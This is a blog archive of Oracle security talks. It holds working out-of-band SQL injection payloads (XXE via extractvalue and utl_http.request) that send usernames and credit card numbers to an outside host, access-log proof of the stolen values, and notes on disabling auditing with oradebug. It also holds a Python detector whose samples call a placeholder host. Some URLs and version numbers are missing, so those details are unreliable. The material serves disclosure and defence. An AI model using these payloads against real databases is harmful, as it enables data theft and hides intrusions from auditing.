Archive for the ‘Oracle Security’ Category

DOAG conference: Best of Oracle Security – older presentations (2013-2017)

Sunday, November 25th, 2018

Here is a list of older "Best-of" presentations:

Best of Oracle Security 2017

Best of Oracle Security 2016

Best of Oracle Security 2015

Best of Oracle Security 2014

Best of Oracle Security 2013

DOAG 2018: Best of Oracle Security 2018

Sunday, November 25th, 2018

Last week I gave my yearly presentation "Best of Oracle Security 2018" at the DOAG 2018 conference in Nürnberg. In this presentation I talked about different Oracle exploits, a vulnerability in, DNS data exfiltration in Oracle and how to audit SYSDBA connections in Oracle.


Additionally I talked about the German DSGVO (GDPR): "Wie wird die DSGVO umgesetzt und welche Lücken/Lügen gibt es?" ("How is the GDPR being implemented, and which gaps/lies are there?")


DOAG 2015: Best of Oracle Security 2015

Thursday, November 19th, 2015

Yesterday I gave my yearly presentation "Best of Oracle Security 2015" at the DOAG 2015 conference in Nürnberg. In this presentation I showed different Oracle exploits, released in 2015 in various sources, that I found or modified.

One of the most interesting Oracle bugs in 2015 was CVE-2014-6577 (found by Trustwave, affecting,,, 12.1.02, fixed in April 2015 CPU). This bug can be used as a helper function in out-of-band SQL injection attacks. Since Oracle 11g, the route via utl_http/httpuritype has been closed by ACLs. This exploit reopens that route in 11g/12g (if patches are not applied).

—— Out-of-Band SQL Injection Example —————-

' or 1=extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "'||substr((select sys.stragg(distinct username||'-') as string from all_users),1,220)||'"> %remote; %param1;]>'),'/l')

- - [18/Nov/2015 00:48:02] "GET /A=ANONYMOUS-APEX_040200-APEX_PUBLIC_USER-APPQOSSYS-AUDSYS-C HTTP/1.0" 404 -

—— Out-of-Band SQL Injection Example —————-
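
One way a defender could flag this payload shape in captured SQL text (audit trail, WAF or application logs), added here as an example and not code from the presentation. The rule set, the sample statements and the host collector.invalid are constructed assumptions.

```python
import re

# Rules are assumptions for this example, not Oracle-supplied signatures.
# 1. An external entity declaration (<!ENTITY ... SYSTEM "...") in SQL text.
ENTITY_SYSTEM = re.compile(r'<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\s', re.I)
# 2. XML parsing entry points used by the payload in the post.
XML_PARSE = re.compile(r'\b(?:xmltype|extractvalue)\s*\(', re.I)
# 3. A SYSTEM identifier assembled with || from query results.
DYNAMIC_URI = re.compile(r'SYSTEM\s+"[^"]*\'\s*\|\|', re.I)
# 4. The ACL-guarded network helpers named in the post.
NET_HELPERS = re.compile(r'\b(?:utl_http\s*\.\s*request|httpuritype)\b', re.I)


def classify(sql):
    """Return the findings for one SQL statement, most specific last."""
    text = " ".join(sql.split())  # collapse newlines/tabs that split keywords
    findings = []
    if XML_PARSE.search(text) and ENTITY_SYSTEM.search(text):
        findings.append("xml-external-entity")
        if DYNAMIC_URI.search(text):
            findings.append("dynamic-system-uri")
    if NET_HELPERS.search(text):
        findings.append("network-helper")
    return findings


def scan(statements):
    """Yield (index, findings) for every statement with at least one finding."""
    for i, sql in enumerate(statements):
        hits = classify(sql)
        if hits:
            yield i, hits


# Constructed sample statements (collector.invalid is a placeholder host).
SAMPLES = [
    "select name from emp where id = 7",
    "select extractvalue(xmltype('<a><l>1</l></a>'),'/a/l') from dual",
    "select * from t where c='' or 1=extractvalue(xmltype('<?xml version=\"1.0\"?>"
    "<!DOCTYPE root [ <!ENTITY % remote SYSTEM \"http://collector.invalid/A='||"
    "substr((select user from dual),1,220)||'\"> %remote;]>'),'/l') --",
    "select * from credit_card where 1=length("
    "utl_http.request('http://collector.invalid/'||card_id))",
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLES):
        print(idx, hits)
```

Plain XML parsing (the second sample) is not flagged; only an external entity inside the parsed string is, and a SYSTEM identifier built by concatenation is reported separately because it carries query results off the host.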

Details about a critical design flaw (using unsalted MD5 as 12c password hash) in Oracle 12c will be published in another blog entry.

Best of Oracle Security 2013

Friday, November 22nd, 2013

I just uploaded my DOAG 2013 presentation "Best of Oracle Security 2013".


This presentation shows how to bypass Oracle Data Redaction, become DBA using CREATE ANY INDEX, hide information from Oracle Auditing using VPD and more…


SQL> select * from scott.credit_card where 1=ordsys.ord_dicom.getmappingxpath((card_id),user,user);

ERROR at line 1:
ORA-53044: invalid tag: 1234-1234-1234-1234
ORA-06512: at "ORDSYS.ORDERROR", line 5
ORA-06512: at "ORDSYS.ORD_DICOM_ADMIN_PRV", line 1394
ORA-06512: at "ORDSYS.ORD_DICOM_ADMIN_PRV", line 479
ORA-06512: at "ORDSYS.ORD_DICOM_ADMIN_PRV", line 8232
ORA-06512: at "ORDSYS.ORD_DICOM", line 756
ORA-06512: at line 1




select * from credit_card where 1=length(utl_http.request(''||card_id));

==> bypassing the obfuscation because the utl_http.request is located in the where clause


——– output from access.log ————

- - [13/Sep/2013:15:19:20 Central Europe Daylight Time] "GET /1234-1234-1234-1234 HTTP/1.1" 404 35 - -
- - [13/Sep/2013:15:19:20 Central Europe Daylight Time] "GET /5678-5678-5678-5678 HTTP/1.1" 404 35 - -

——– output from access.log ————



Fix for oradebug disable auditing available (

Friday, September 13th, 2013

2 days ago I gave a presentation "Oracle 12c from the attackers perspective" at the DOAG SIG Security. I learned some interesting things, especially that a fix for the Oracle oradebug "disable auditing" problem has been available for 9 months.

Oradebug allows running OS commands and enabling/disabling Oracle SYSDBA and normal auditing on the fly without leaving traces in the audit log. The fix for this problem is available in Oracle and was backported to using the patches 15805002, 15808245, 16177780.

By default the setting is not enabled in Oracle

The undocumented parameter _fifteenth_spare_parameter (Oracle description: fifteenth spare parameter – integer – Yeah, really useful) can now disable or limit the oradebug functionality. I could not find any information about this parameter on Google or My Oracle Support.

—— extract from the read me.txt of the patch file——————

## _fifteenth_spare_parameter can be set to "all", "restricted" or "none"
## "all" disables execution of all oradebug commands, "restricted" disables
## execution of restricted oradebug commands, "none" (default) allows execution
## of oradebug commands.

—— extract from the read me.txt ——————